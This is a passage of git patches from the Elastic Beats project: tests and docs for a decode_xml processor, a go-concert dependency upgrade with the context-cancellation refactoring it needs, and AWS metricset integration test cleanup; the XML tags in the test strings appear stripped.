+ + Ralls, Kim + Midnight Rain + Some review. + + + + Ralls, Kim + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + + `, + }, + Output: common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "title": "The Recognitions", + }, + map[string]interface{}{ + "author": "Ralls, Kim", + "review": "Some review.", + "title": "Midnight Rain", + }, + }, + "secondcategory": map[string]interface{}{ + "paper": map[string]interface{}{ + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "id": "bk102", + "test2": "Ralls, Kim", + }, + }, + }, + }, + }, + }, + { + description: "Decoding with broken XML format, with IgnoreFailure false", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: false, + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + }, + Output: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + "error": common.MapStr{"message": "failed in decode_xml on the \"message\" field: error decoding XML field: XML syntax error on line 7: element closed by "}, + }, + error: true, + errorMessage: "error decoding XML field:", + }, + { + description: "Decoding with broken XML format, with IgnoreFailure true", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: true, + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + }, + Output: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + }, + }, + { + description: "Test when the XML field is empty, IgnoreMissing false", + config: decodeXMLConfig{ + Field: "message2", + IgnoreMissing: false, + }, + Input: common.MapStr{ + "message": "testing message", + }, + Output: common.MapStr{ + "message": "testing message", + "error": common.MapStr{"message": "failed in decode_xml on the \"message2\" field: key not found"}, + }, + error: true, + errorMessage: "key not found", + }, + { + description: "Test when the XML field is empty IgnoreMissing true", + config: decodeXMLConfig{ + Field: "message2", + IgnoreMissing: true, + }, + Input: common.MapStr{ + "message": "testing message", + }, + Output: common.MapStr{ + "message": "testing message", + }, + }, + { + description: "Test when the XML field not a string, IgnoreFailure false", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: false, + }, + Input: common.MapStr{ + "message": 1, + }, + Output: common.MapStr{ + "message": 1, + "error": common.MapStr{"message": "failed in decode_xml on the \"message\" field: field value is not a string"}, + }, + error: true, + errorMessage: "field value is not a string", + }, + { + description: "Test when the XML field not a string, IgnoreFailure true", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: true, + }, + Input: common.MapStr{ + "message": 1, + }, + Output: common.MapStr{ + "message": 1, + }, + }, + } + + for _, test := range testCases { + test := test + t.Run(test.description, func(t *testing.T) { + t.Parallel() + + f, err := newDecodeXML(test.config) + require.NoError(t, err) + + event := &beat.Event{ + Fields: test.Input, + } + newEvent, err := f.Run(event) + if !test.error { + assert.NoError(t, err) + } else { + if assert.Error(t, err) { + assert.Contains(t, err.Error(), test.errorMessage) + } + } + assert.Equal(t, test.Output, newEvent.Fields) + }) + } +} + +func BenchmarkProcessor_Run(b *testing.B) { + c := defaultConfig() + target := "xml" + c.Target = &target + p, err := newDecodeXML(c) + require.NoError(b, err) + + b.Run("single_object", func(b *testing.B) { + evt := &beat.Event{Fields: map[string]interface{}{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }} + + for i := 0; i < b.N; i++ { + _, err = p.Run(evt) + if err != nil { + b.Fatal(err) + } + } + }) + + b.Run("nested_and_array_object", func(b *testing.B) { + evt := &beat.Event{Fields: map[string]interface{}{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + + Ralls, Kim + Midnight Rain + Some review. + + + + Ralls, Kim + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + + `, + }} + + for i := 0; i < b.N; i++ { + _, err = p.Run(evt) + if err != nil { + b.Fatal(err) + } + } + }) +} + +func TestXMLToDocumentID(t *testing.T) { + p, err := newDecodeXML(decodeXMLConfig{ + Field: "message", + DocumentID: "catalog.book.seq", + }) + require.NoError(t, err) + + input := common.MapStr{ + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + } + actual, err := p.Run(&beat.Event{Fields: input}) + require.NoError(t, err) + + wantFields := common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "title": "The Recognitions", + }, + }, + }, + } + wantMeta := common.MapStr{ + "_id": "10", + } + + assert.Equal(t, wantFields, actual.Fields) + assert.Equal(t, wantMeta, actual.Meta) +} diff --git a/libbeat/processors/decode_xml/docs/decode_xml.asciidoc b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc new file mode 100644 index 000000000000..ded0543514ac --- /dev/null +++ b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc @@ -0,0 +1,115 @@ +[[decode_xml]] +=== Decode XML + +++++ +decode_xml +++++ + +experimental[] + +The `decode_xml` processor decodes XML data that is stored under the `field` +key. It outputs the result into the `target_field`. + +This example demonstrates how to decode an XML string contained in the `message` +field and write the resulting fields into the root of the document. Any fields +that already exist will be overwritten. + +[source,yaml] +------- +processors: + - decode_xml: + field: message + target_field: "" + overwrite_keys: true +------- + +By default any decoding errors that occur will stop the processing chain and the +error will be added to `error.message` field. To ignore all errors and continue +to the next processor you can set `ignore_failure: true`. To specifically +ignore failures caused by `field` not existing use `ignore_missing`. + +[source,yaml] +------- +processors: + - decode_xml: + field: example + target_field: xml + ignore_missing: true + ignore_failure: true +------- + +By default all keys converted from XML will have the names converted to +lowercase. If there is a need to disable this behavior it is possible to use the +below example: + +[source,yaml] +------- +processors: + - decode_xml: + field: message + target_field: xml + to_lower: false +------- + +Example XML input: + +[source,xml] +------------------------------------------------------------------------------- +{ + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + +} +------------------------------------------------------------------------------- + +Will produce the following output: + +[source,json] +------------------------------------------------------------------------------- +{ + "xml": { + "catalog": { + "book": { + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions" + } + } + } +} +------------------------------------------------------------------------------- + + +The supported configuration options are: + +`field`:: (Required) Source field containing the XML. Defaults to `message`. + +`target_field`:: (Optional) The field under which the decoded XML will be +written. By default the decoded XML object replaces the field from which it was +read. To merge the decoded XML fields into the root of the event specify +`target_field` with an empty string (`target_field: ""`). Note that the `null` +value (`target_field:`) is treated as if the field was not set at all. + +`overwrite_keys`:: (Optional) A boolean that specifies whether keys that already +exist in the event are overwritten by keys from the decoded XML object. The +default value is false. + +`to_lower`:: (Optional) Converts all keys to lowercase. Accepts either true or +false. The default value is true. + +`document_id`:: (Optional) XML key to use as the document ID. If configured, the +field will be removed from the original XML document and stored in +`@metadata._id`. + +`ignore_missing`:: (Optional) If `true` the processor will not return an error +when a specified field does not exist. Defaults to `false`. + +`ignore_failure`:: (Optional) Ignore all errors produced by the processor. +Defaults to `false`. + +See <> for a list of supported conditions. From 342a845060eb3fbfd69dfedd17d960b2c6eb17d0 Mon Sep 17 00:00:00 2001 From: Steffen Siering Date: Mon, 15 Feb 2021 23:49:11 +0100 Subject: [PATCH 47/63] Update go-concert to 0.1.0 (#23770) --- NOTICE.txt | 4 +- filebeat/input/filestream/filestream.go | 68 +++++++------------ filebeat/input/filestream/input.go | 2 +- filebeat/input/v2/compat/compat.go | 9 +-- filebeat/input/winlog/input.go | 2 +- filebeat/inputsource/common/dgram/server.go | 41 ++++++----- .../inputsource/common/streaming/listener.go | 9 ++- go.mod | 2 +- go.sum | 4 +- journalbeat/reader/journal.go | 13 ++-- x-pack/filebeat/input/cloudfoundry/v1.go | 2 +- x-pack/filebeat/input/http_endpoint/input.go | 4 +- 12 files changed, 73 insertions(+), 87 deletions(-) diff --git a/NOTICE.txt b/NOTICE.txt index d5811381395a..4a49e2f9af43 100644 --- a/NOTICE.txt +++ b/NOTICE.txt @@ -6336,11 +6336,11 @@ SOFTWARE -------------------------------------------------------------------------------- Dependency : github.com/elastic/go-concert -Version: v0.0.4 +Version: v0.1.0 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/go-concert@v0.0.4/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/elastic/go-concert@v0.1.0/LICENSE: Apache License Version 2.0, January 2004 diff --git a/filebeat/input/filestream/filestream.go b/filebeat/input/filestream/filestream.go index 1a559c67e060..908d85581459 100644 --- a/filebeat/input/filestream/filestream.go +++ b/filebeat/input/filestream/filestream.go @@ -18,18 +18,19 @@ package filestream import ( - "context" "errors" "io" "os" "time" + "github.com/elastic/go-concert/ctxtool" + "github.com/elastic/go-concert/timed" + "github.com/elastic/go-concert/unison" + input "github.com/elastic/beats/v7/filebeat/input/v2" "github.com/elastic/beats/v7/libbeat/common/backoff" "github.com/elastic/beats/v7/libbeat/common/file" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/go-concert/ctxtool" - "github.com/elastic/go-concert/unison" ) var ( @@ -39,10 +40,9 @@ var ( // logFile contains all log related data type logFile struct { - file *os.File - log *logp.Logger - ctx context.Context - cancelReading context.CancelFunc + file *os.File + log *logp.Logger + readerCtx ctxtool.CancelContext closeAfterInterval time.Duration closeOnEOF bool @@ -55,7 +55,7 @@ type logFile struct { offset int64 lastTimeRead time.Time backoff backoff.Backoff - tg unison.TaskGroup + tg *unison.TaskGroup } // newFileReader creates a new log instance to read log sources @@ -71,6 +71,9 @@ func newFileReader( return nil, err } + readerCtx := ctxtool.WithCancelContext(ctxtool.FromCanceller(canceler)) + tg := unison.TaskGroupWithCancel(readerCtx) + l := &logFile{ file: f, log: log, @@ -83,16 +86,10 @@ func newFileReader( offset: offset, lastTimeRead: time.Now(), backoff: backoff.NewExpBackoff(canceler.Done(), config.Backoff.Init, config.Backoff.Max), - tg: unison.TaskGroup{}, + readerCtx: readerCtx, + tg: tg, } - l.ctx, l.cancelReading = ctxtool.WithFunc(ctxtool.FromCanceller(canceler), func() { - err := l.tg.Stop() - if err != nil { - l.log.Errorf("Error while stopping filestream logFile reader: %v", err) - } - }) - l.startFileMonitoringIfNeeded() return l, nil @@ -103,7 +100,7 @@ func newFileReader( func (f *logFile) Read(buf []byte) (int, error) { totalN := 0 - for f.ctx.Err() == nil { + for f.readerCtx.Err() == nil { n, err := f.file.Read(buf) if n > 0 { f.offset += int64(n) @@ -154,35 +151,18 @@ func (f *logFile) startFileMonitoringIfNeeded() { } func (f *logFile) closeIfTimeout(ctx unison.Canceler) { - timer := time.NewTimer(f.closeAfterInterval) - defer timer.Stop() - - for { - select { - case <-ctx.Done(): - return - case <-timer.C: - f.cancelReading() - return - } + if err := timed.Wait(ctx, f.closeAfterInterval); err == nil { + f.readerCtx.Cancel() } } func (f *logFile) periodicStateCheck(ctx unison.Canceler) { - ticker := time.NewTicker(f.checkInterval) - defer ticker.Stop() - - for { - select { - case <-ctx.Done(): - return - case <-ticker.C: - if f.shouldBeClosed() { - f.cancelReading() - return - } + timed.Periodic(ctx, f.checkInterval, func() error { + if f.shouldBeClosed() { + f.readerCtx.Cancel() } - } + return nil + }) } func (f *logFile) shouldBeClosed() bool { @@ -267,6 +247,8 @@ func (f *logFile) handleEOF() error { // Close func (f *logFile) Close() error { - f.cancelReading() - return f.file.Close() + f.readerCtx.Cancel() + err := f.file.Close() + f.tg.Stop() // Wait until all resources are released for sure. + return err } diff --git a/filebeat/input/filestream/input.go b/filebeat/input/filestream/input.go index 8d40284c3661..8f21cb505cee 100644 --- a/filebeat/input/filestream/input.go +++ b/filebeat/input/filestream/input.go @@ -159,7 +159,7 @@ func (inp *filestream) Run( return err } - _, streamCancel := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { + _, streamCancel := ctxtool.WithFunc(ctx.Cancelation, func() { log.Debug("Closing reader of filestream") err := r.Close() if err != nil { diff --git a/filebeat/input/v2/compat/compat.go b/filebeat/input/v2/compat/compat.go index 67bc9c7ac13b..ad2d2a16e8ff 100644 --- a/filebeat/input/v2/compat/compat.go +++ b/filebeat/input/v2/compat/compat.go @@ -21,6 +21,7 @@ package compat import ( + "context" "fmt" "sync" @@ -31,7 +32,7 @@ import ( "github.com/elastic/beats/v7/libbeat/cfgfile" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/go-concert" + "github.com/elastic/go-concert/ctxtool" ) // factory implements the cfgfile.RunnerFactory interface and wraps the @@ -52,7 +53,7 @@ type runner struct { log *logp.Logger agent *beat.Info wg sync.WaitGroup - sig *concert.OnceSignaler + sig ctxtool.CancelContext input v2.Input connector beat.PipelineConnector } @@ -94,7 +95,7 @@ func (f *factory) Create( id: id, log: f.log.Named(input.Name()), agent: &f.info, - sig: concert.NewOnceSignaler(), + sig: ctxtool.WithCancelContext(context.Background()), input: input, connector: p, }, nil @@ -126,7 +127,7 @@ func (r *runner) Start() { } func (r *runner) Stop() { - r.sig.Trigger() + r.sig.Cancel() r.wg.Wait() r.log.Infof("Input '%v' stopped", r.input.Name()) } diff --git a/filebeat/input/winlog/input.go b/filebeat/input/winlog/input.go index ced7a62b228d..08b15a84b4b4 100644 --- a/filebeat/input/winlog/input.go +++ b/filebeat/input/winlog/input.go @@ -98,7 +98,7 @@ func (eventlogRunner) Run( // setup closing the API if either the run function is signaled asynchronously // to shut down or when returning after io.EOF - cancelCtx, cancelFn := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { + cancelCtx, cancelFn := ctxtool.WithFunc(ctx.Cancelation, func() { if err := api.Close(); err != nil { log.Errorf("Error while closing Windows Eventlog Access: %v", err) } diff --git a/filebeat/inputsource/common/dgram/server.go b/filebeat/inputsource/common/dgram/server.go index ecb4844ed673..41a028f7d33a 100644 --- a/filebeat/inputsource/common/dgram/server.go +++ b/filebeat/inputsource/common/dgram/server.go @@ -72,26 +72,29 @@ func (l *Listener) Run(ctx context.Context) error { l.log.Info("Started listening for " + l.family.String() + " connection") for ctx.Err() == nil { - conn, err := l.listener() - if err != nil { - l.log.Debugw("Cannot connect", "error", err) - continue - } - connCtx, connCancel := ctxtool.WithFunc(ctx, func() { - conn.Close() - }) - - err = l.run(connCtx, conn) - if err != nil { - l.log.Debugw("Error while processing input", "error", err) - connCancel() - continue - } - connCancel() + l.doRun(ctx) } return nil } +func (l *Listener) doRun(ctx context.Context) { + conn, err := l.listener() + if err != nil { + l.log.Debugw("Cannot connect", "error", err) + return + } + + connCtx, connCancel := ctxtool.WithFunc(ctx, func() { + conn.Close() + }) + defer connCancel() + + err = l.connectAndRun(connCtx, conn) + if err != nil { + l.log.Debugw("Error while processing input", "error", err) + } +} + func (l *Listener) Start() error { l.log.Info("Started listening for " + l.family.String() + " connection") @@ -106,12 +109,14 @@ func (l *Listener) Start() error { }) defer connCancel() - return l.run(ctxtool.FromCanceller(connCtx), conn) + return l.connectAndRun(ctxtool.FromCanceller(connCtx), conn) }) return nil } -func (l *Listener) run(ctx context.Context, conn net.PacketConn) error { +func (l *Listener) connectAndRun(ctx context.Context, conn net.PacketConn) error { + defer l.log.Recover("Panic handling datagram") + handler := l.connect(*l.config) for ctx.Err() == nil { err := handler(ctx, conn) diff --git a/filebeat/inputsource/common/streaming/listener.go b/filebeat/inputsource/common/streaming/listener.go index 16e708f554bd..11e60a35b7bf 100644 --- a/filebeat/inputsource/common/streaming/listener.go +++ b/filebeat/inputsource/common/streaming/listener.go @@ -41,8 +41,7 @@ type Listener struct { family inputsource.Family wg sync.WaitGroup log *logp.Logger - ctx context.Context - cancel context.CancelFunc + ctx ctxtool.CancelContext clientsCount atomic.Int handlerFactory HandlerFactory listenerFactory ListenerFactory @@ -111,9 +110,9 @@ func (l *Listener) initListen(ctx context.Context) error { return err } - l.ctx, l.cancel = ctxtool.WithFunc(ctx, func() { + l.ctx = ctxtool.WrapCancel(ctxtool.WithFunc(ctx, func() { l.Listener.Close() - }) + })) return nil } @@ -171,7 +170,7 @@ func (l *Listener) run() { // Stop stops accepting new incoming connections and Close any active clients func (l *Listener) Stop() { l.log.Info("Stopping" + l.family.String() + "server") - l.cancel() + l.ctx.Cancel() l.wg.Wait() l.log.Info(l.family.String() + " server stopped") } diff --git a/go.mod b/go.mod index fb47064f7ca2..7d5c452cc38f 100644 --- a/go.mod +++ b/go.mod @@ -61,7 +61,7 @@ require ( github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2 github.com/elastic/ecs v1.6.0 github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a - github.com/elastic/go-concert v0.0.4 + github.com/elastic/go-concert v0.1.0 github.com/elastic/go-libaudit/v2 v2.1.0 github.com/elastic/go-licenser v0.3.1 github.com/elastic/go-lookslike v0.3.0 diff --git a/go.sum b/go.sum index 28477be0c461..118df228463f 100644 --- a/go.sum +++ b/go.sum @@ -253,8 +253,8 @@ github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a h1 github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a/go.mod h1:uh/Gj9a0XEbYoM4NYz4LvaBVARz3QXLmlNjsrKY9fTc= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270 h1:cWPqxlPtir4RoQVCpGSRXmLqjEHpJKbR60rxh1nQZY4= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270/go.mod h1:Msl1pdboCbArMF/nSCDUXgQuWTeoMmE/z8607X+k7ng= -github.com/elastic/go-concert v0.0.4 h1:pzgYCmJ/xMJsW8PSk33inAWZ065hrwSeP79TpwAbsLE= -github.com/elastic/go-concert v0.0.4/go.mod h1:9MtFarjXroUgmm0m6HY3NSe1XiKhdktiNRRj9hWvIaM= +github.com/elastic/go-concert v0.1.0 h1:gz/yvA3bseuHzoF/lNMltkL30XdPqMo+bg5o2mBx2EE= +github.com/elastic/go-concert v0.1.0/go.mod h1:9MtFarjXroUgmm0m6HY3NSe1XiKhdktiNRRj9hWvIaM= github.com/elastic/go-libaudit/v2 v2.1.0 h1:yWSKoGaoWLGFPjqWrQ4gwtuM77pTk7K4CsPxXss8he4= github.com/elastic/go-libaudit/v2 v2.1.0/go.mod h1:MM/l/4xV7ilcl+cIblL8Zn448J7RZaDwgNLE4gNKYPg= github.com/elastic/go-licenser v0.3.1 h1:RmRukU/JUmts+rpexAw0Fvt2ly7VVu6mw8z4HrEzObU= diff --git a/journalbeat/reader/journal.go b/journalbeat/reader/journal.go index 6b3136d65c66..10aa382a1421 100644 --- a/journalbeat/reader/journal.go +++ b/journalbeat/reader/journal.go @@ -39,23 +39,23 @@ type Reader struct { r *journalread.Reader journal *sdjournal.Journal config Config - done chan struct{} + ctx ctxtool.CancelContext logger *logp.Logger backoff backoff.Backoff } // New creates a new journal reader and moves the FP to the configured position. -func New(c Config, done chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { +func New(c Config, done <-chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { return newReader(c.Path, c, done, state, logger) } // NewLocal creates a reader to read form the local journal and moves the FP // to the configured position. -func NewLocal(c Config, done chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { +func NewLocal(c Config, done <-chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { return newReader(LocalSystemJournalID, c, done, state, logger) } -func newReader(path string, c Config, done chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { +func newReader(path string, c Config, done <-chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { logger = logger.With("path", path) backoff := backoff.NewExpBackoff(done, c.Backoff, c.MaxBackoff) @@ -79,7 +79,7 @@ func newReader(path string, c Config, done chan struct{}, state checkpoint.Journ r: r, journal: journal, config: c, - done: done, + ctx: ctxtool.WithCancelContext(ctxtool.FromChannel(done)), logger: logger, backoff: backoff, }, nil @@ -100,13 +100,14 @@ func seekBy(log *logp.Logger, c Config, state checkpoint.JournalState) (journalr // Close closes the underlying journal reader. func (r *Reader) Close() { instance.StopMonitoringJournal(r.config.Path) + r.ctx.Cancel() r.r.Close() } // Next waits until a new event shows up and returns it. // It blocks until an event is returned or an error occurs. func (r *Reader) Next() (*beat.Event, error) { - entry, err := r.r.Next(ctxtool.FromChannel(r.done)) + entry, err := r.r.Next(r.ctx) if err != nil { return nil, err } diff --git a/x-pack/filebeat/input/cloudfoundry/v1.go b/x-pack/filebeat/input/cloudfoundry/v1.go index ffc5ccd4a75b..100fb9443191 100644 --- a/x-pack/filebeat/input/cloudfoundry/v1.go +++ b/x-pack/filebeat/input/cloudfoundry/v1.go @@ -51,7 +51,7 @@ func (i *inputV1) Run(ctx v2.Context, publisher stateless.Publisher) error { return errors.Wrapf(err, "initializing doppler consumer") } - stopCtx, cancel := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { + stopCtx, cancel := ctxtool.WithFunc(ctx.Cancelation, func() { // wait stops the consumer and waits for all internal go-routines to be stopped. consumer.Wait() }) diff --git a/x-pack/filebeat/input/http_endpoint/input.go b/x-pack/filebeat/input/http_endpoint/input.go index 2c799c1f14fa..3e01616ed48a 100644 --- a/x-pack/filebeat/input/http_endpoint/input.go +++ b/x-pack/filebeat/input/http_endpoint/input.go @@ -103,9 +103,7 @@ func (e *httpEndpoint) Run(ctx v2.Context, publisher stateless.Publisher) error mux := http.NewServeMux() mux.HandleFunc(e.config.URL, withValidator(validator, handler.apiResponse)) server := &http.Server{Addr: e.addr, TLSConfig: e.tlsConfig, Handler: mux} - _, cancel := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { - server.Close() - }) + _, cancel := ctxtool.WithFunc(ctx.Cancelation, func() { server.Close() }) defer cancel() var err error From ba423212a660a576efb8b0ec711eb339328108ca Mon Sep 17 00:00:00 2001 From: kaiyan-sheng Date: Mon, 15 Feb 2021 15:52:04 -0700 Subject: [PATCH 48/63] Check fields are documented for aws metricsets (#23887) --- CHANGELOG.next.asciidoc | 2 ++ .../cloudwatch/cloudwatch_integration_test.go | 1 + .../module/aws/rds/rds_integration_test.go | 19 +-------------- .../s3_daily_storage_integration_test.go | 9 +------ .../s3_request/s3_request_integration_test.go | 24 +------------------ .../module/aws/sqs/sqs_integration_test.go | 18 +------------- 6 files changed, 7 insertions(+), 66 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 22d95586bc5a..8ab8d10c7f2c 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -497,6 +497,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] - Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] +- Unskip s3_request integration test. {pull}23887[23887] - Add system.hostfs configuration option for system module. {pull}23831[23831] *Packetbeat* @@ -959,6 +960,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] - Release MSSQL as GA {pull}23146[23146] - Enrich events of `state_service` metricset with kubernetes services' metadata. {pull}23730[23730] +- Check fields are documented in aws metricsets. {pull}23887[23887] *Packetbeat* diff --git a/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go b/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go index c99c6acb40c2..f2a136c36a32 100644 --- a/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go +++ b/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go @@ -27,6 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/rds/rds_integration_test.go b/x-pack/metricbeat/module/aws/rds/rds_integration_test.go index 0be93854039d..f19d5a7dd054 100644 --- a/x-pack/metricbeat/module/aws/rds/rds_integration_test.go +++ b/x-pack/metricbeat/module/aws/rds/rds_integration_test.go @@ -26,24 +26,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - t.Logf("%s/%s event: %+v", metricSet.Module().Name(), metricSet.Name(), event) - - // RootField - mtest.CheckEventField("service.name", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("cloud.availability_zone", "string", event, t) - - // MetricSetField - mtest.CheckEventField("db_instance.arn", "string", event, t) - mtest.CheckEventField("db_instance.class", "string", event, t) - mtest.CheckEventField("queries", "float", event, t) - mtest.CheckEventField("latency.select", "float", event, t) - mtest.CheckEventField("login_failures", "float", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go b/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go index e570cd5bb730..e410251090e3 100644 --- a/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go +++ b/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go @@ -27,14 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("aws.dimensions.BucketName", "string", event, t) - mtest.CheckEventField("aws.dimensions.StorageType", "string", event, t) - mtest.CheckEventField("aws.s3.metrics.BucketSizeBytes.avg", "float", event, t) - mtest.CheckEventField("aws.s3.metrics.NumberOfObjects.avg", "float", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go b/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go index 6836d8469756..cd11e95fd88a 100644 --- a/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go +++ b/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go @@ -18,7 +18,6 @@ import ( ) func TestFetch(t *testing.T) { - t.Skip("flaky test: https://github.com/elastic/beats/issues/21826") config := mtest.GetConfigForTest(t, "s3_request", "60s") metricSet := mbtest.NewReportingMetricSetV2Error(t, config) @@ -28,28 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("aws.dimensions.BucketName", "string", event, t) - mtest.CheckEventField("aws.dimensions.StorageType", "string", event, t) - mtest.CheckEventField("s3.metrics.AllRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.GetRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.PutRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.DeleteRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.HeadRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.PostRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.SelectRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.SelectScannedBytes.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.SelectReturnedBytes.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.ListRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.BytesDownloaded.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.BytesUploaded.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.4xxErrors.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.5xxErrors.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.FirstByteLatency.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.TotalRequestLatency.avg", "float", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go b/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go index 3f1eddb9faa9..24f1c314b73d 100644 --- a/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go +++ b/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go @@ -27,23 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - // RootField - mtest.CheckEventField("service.name", "string", event, t) - mtest.CheckEventField("cloud.region", "string", event, t) - // MetricSetField - mtest.CheckEventField("empty_receives", "float", event, t) - mtest.CheckEventField("messages.delayed", "float", event, t) - 